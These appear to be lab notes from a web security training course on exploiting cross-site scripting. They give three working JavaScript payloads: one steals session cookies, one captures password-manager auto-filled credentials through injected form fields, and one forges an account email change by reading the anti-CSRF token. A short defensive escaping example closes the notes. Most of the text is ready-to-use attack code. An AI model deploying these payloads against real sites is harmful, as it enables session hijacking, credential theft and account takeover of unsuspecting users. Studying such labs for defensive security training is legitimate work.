# Cross-site scripting (exploits)

Note: Update the base URL https://ac741f481eba7f5d80a83ee7003a00d0.web-security-academy.net/ to match yours!

Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.

## Exploiting cross-site scripting to steal cookies

Stealing cookies is a traditional way to exploit XSS. Most web applications use cookies for session handling. You can exploit cross-site scripting vulnerabilities to send the victim's cookies to your own domain, then manually inject the cookies into your browser and impersonate the victim.

```html
<script>
window.onload = function(e) {
    // Read the page's anti-CSRF token so the forged comment is accepted.
    var csrf = document.getElementsByName("csrf")[0].value;
    console.log(csrf);
    // Post a comment that carries the victim's cookies; they end up visible in the blog.
    fetch('https://ac6b1f801e21e609805034f000bf00b3.web-security-academy.net/post/comment', {
        method: 'POST',
        body: 'csrf=' + csrf + '&postId=1&comment=Cookie: ' + document.cookie + '&name=Jan&email=admin%40cmdnctrl.net&website='
    });
};
</script>
```

## Exploiting cross-site scripting to capture passwords

These days, many users have password managers that auto-fill their passwords. You can take advantage of this by creating a password input, reading out the auto-filled password, and sending it to your own domain. This technique avoids most of the problems associated with stealing cookies, and can even gain access to every other account where the victim has reused the same password.

```html
<!-- Injected login-like fields that the victim's password manager will auto-fill. -->
<form><input type="text" id="username" name="username"></form>
<form><input type="password" id="password" name="password"></form>
<script>
window.onload = function(e) {
    // Wait a moment so the password manager has time to fill the fields.
    setTimeout(function() {
        var csrf = document.getElementsByName("csrf")[0].value;
        var username = document.getElementById("username").value;
        var passw = document.getElementById("password").value;
        console.log(csrf);
        // Post the auto-filled credentials as a blog comment.
        fetch('https://ac741f481eba7f5d80a83ee7003a00d0.web-security-academy.net/post/comment', {
            method: 'POST',
            body: 'csrf=' + csrf + '&postId=3&comment=Username: ' + username + ', Password: ' + passw + '&name=Jan&email=admin%40cmdnctrl.net&website='
        });
    }, 2500);
};
</script>
```

## Exploiting cross-site scripting to perform CSRF

Anything a legitimate user can do on a web site, you can probably do too with XSS. Depending on the site you're targeting, you might be able to make a victim send a message, accept a friend request, commit a backdoor to a source code repository, or transfer some Bitcoin.

```html
<script>
window.onload = function(e) {
    // The token is readable from the DOM, so it offers no protection once XSS is present.
    var csrf = document.getElementsByName("csrf")[0].value;
    console.log(csrf);
    // Change the victim's account e-mail address using their own session.
    fetch('https://ac8e1fe31e1017ee80982bb700310061.web-security-academy.net/email/change', {
        method: 'POST',
        body: 'csrf=' + csrf + '&email=john@wick.com'
    });
};
</script>
```
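All three payloads rely on user-supplied text reaching the page unencoded. As an added example (not part of these notes or the lab), the following renders a blog comment with the fields used in the `/post/comment` requests above (`name`, `email`, `website`, `comment`) so that script tags and injected forms are shown as text and only `http(s)` author links survive:

```javascript
// Added example: safe rendering of a blog comment. The field names mirror the
// /post/comment request bodies on this page; the markup structure is assumed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape for HTML text content and double-quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Accept only absolute http(s) URLs for the author link; javascript: and
// malformed values are dropped entirely rather than escaped.
function safeWebsite(url) {
  try {
    const parsed = new URL(url);
    return ['http:', 'https:'].includes(parsed.protocol) ? parsed.href : null;
  } catch {
    return null;
  }
}

// Build the comment HTML. The e-mail is deliberately never rendered.
function renderComment({ name, website, comment }) {
  const site = safeWebsite(website);
  const author = site
    ? `<a href="${escapeHtml(site)}" rel="nofollow noopener">${escapeHtml(name)}</a>`
    : escapeHtml(name);
  return `<section class="comment"><p class="author">${author}</p><p>${escapeHtml(comment)}</p></section>`;
}

// Constructed sample input reusing the shape of the payloads above.
const sample = {
  name: '"><img src=x onerror=alert(1)>',
  email: 'admin@cmdnctrl.net',
  website: 'javascript:alert(1)',
  comment: '<script>fetch("/post/comment?c=" + document.cookie)</script>',
};
console.log(renderComment(sample));
```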